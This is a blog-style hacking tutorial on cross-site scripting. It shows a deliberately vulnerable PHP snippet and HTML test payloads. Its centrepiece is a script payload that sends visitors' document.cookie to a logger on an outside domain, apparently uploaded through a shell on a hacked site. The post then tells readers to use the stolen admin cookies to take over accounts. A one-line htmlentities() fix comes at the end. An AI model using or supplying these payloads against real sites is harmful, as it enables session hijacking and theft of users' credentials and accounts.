Hello guys, today i 'am gonna explain to you xss vulnerability, xss vulnerability is the most known vulnerability, this vulnerability was found on facebook, google, yahoo, microsoft, orange and many other websites ...
So How can i find XSS on a website ?
And how can i exploit it ?
So first of all let's say that XSS ( cross site scripting ) let you to run some evil scripts on a websites, so you can change the appearance of a web page, or excute some scripts ( javascript ) on a web page so that you can steal users cookies, steal users credentials ....
There are 2 types of XSS :
- Stored XSS : stored xss let you excute your script on a web page and save it into the database so all users will view the xssed web page. ( i will explain it later )
- Reflected XSS : Reflected xss let you excute your script but you only can see the infected web page. ( i will explain it later )
How can i find XSS ?
First of all let's see a little schema about xss :-) then i will explain it for you step by step !
.png)
Like i said xss let you excute some scripts on a webpage, so let's get a simple php script which infected by xss vulnerability.
<? $text = $_GET['text']; echo $text; ?>Our PHP will GET a variable called text and show it into our web page, without filtering any data so for example i will set text to <font size=8>XSS</font> and let's see what will happened ?
Our url will be like this http://localhost/xss.php?text=<font size=8>XSS</font>
So, like you see variable $text was set to <font size=8>XSS</font> and our html code was executed successfully ! also we can enter a javascript for cookies stealing also, i will explain it later, this example is for Reflected XSS. so you only can see the infected page and you will need to send the full url for the victime to be able to see the infected web page.
Now we move to Stored xss and it's my favorite one, stored xss store your evil script on a database so anyone can see the infected web page ! without sending any link, so here we have a little php script which includes a config file contains mysql database connection data and a variable called $text which get the data and store it into a table called comments and show it again as a comment, don't worry i know you can't understand this only if you are a programmer but no problem i will explain it with images :-P
here we have a web page infected with Stored XSS, ( from root-me.org ) so let's try to exploit it !
Here, i'am going to write a html code which is <font color=green>Xssed</font> so it will show a green word contains " Xssed " let's try it and check if it is vulnerable !
Well done we can see our green word
well done now we know that our web page it's vulnerable, it's the same also for the reflected xss, this is the way to check if a webpage is vulnerable with xss or now or you can use some Softwares used to scan websites like Acunetix and it's the best one.
so, all users can read our comment, or our xssed comment, don't forget we can run some evil scripts and steal users cookies and that's what i will show you now !
Note : I will explain this method for stored xss only but it also can works on reflected xss the same for each other !
first of all, download this php script and upload it on any free webhosting or any hacked website, here i have a shell so i will upload my php script on it ! (it's the same way on a webhost )
So our php Logger was uploaded successfully, So this is our fill logger link :
Link : http://www.pacifichumanresource.com/uploads/log.php
Now we need a javascript to make a redirection to our php logger and log user cookies into a text file called log.txt !
so let's try this script :
<script>window.location="Logger Link + ?cookie=" + document.cookie</script>
sure don't forget to replace Logger Link by your php logger url and replace + ?cookie= by ?cookie= so it will be like this :
<script>window.location="http://www.pacifichumanresource.com/uploads/log.php?cookie=" + document.cookie</script>
Now let's try to execute this Script on our vulnerable page !
So, once you executed this javascript code, any user enter this page will be redirected to your Cookies logger script, and you will See all stolen cookies on a text file called 'log.txt'
well done, after executing our evil script, now we can steal all cookies of all users who visit our infected page ! and like you see now we have the admin cookies, so you can access the administrator area just by editing cookies to transform your status from Simple User to Administrator !
Like i said this method can be excuted also on reflected xss ! like this :
Note : for chrome users, chrome has a new option to imrove users security, using a new xss detector to bloc any evil script on any webpage !
So like you see here script was rejected by chrome
To protect your website from xss vulnerabilities, just add htmlentities() function before the variable ! like this here :
Now there is no xss vulnerability !
the html script or javascript was filtered using html entities ! and it will be shown as a text !
If you like this article, just click like on our facebook page it's very easy just one click and thanks
EmoticonEmoticon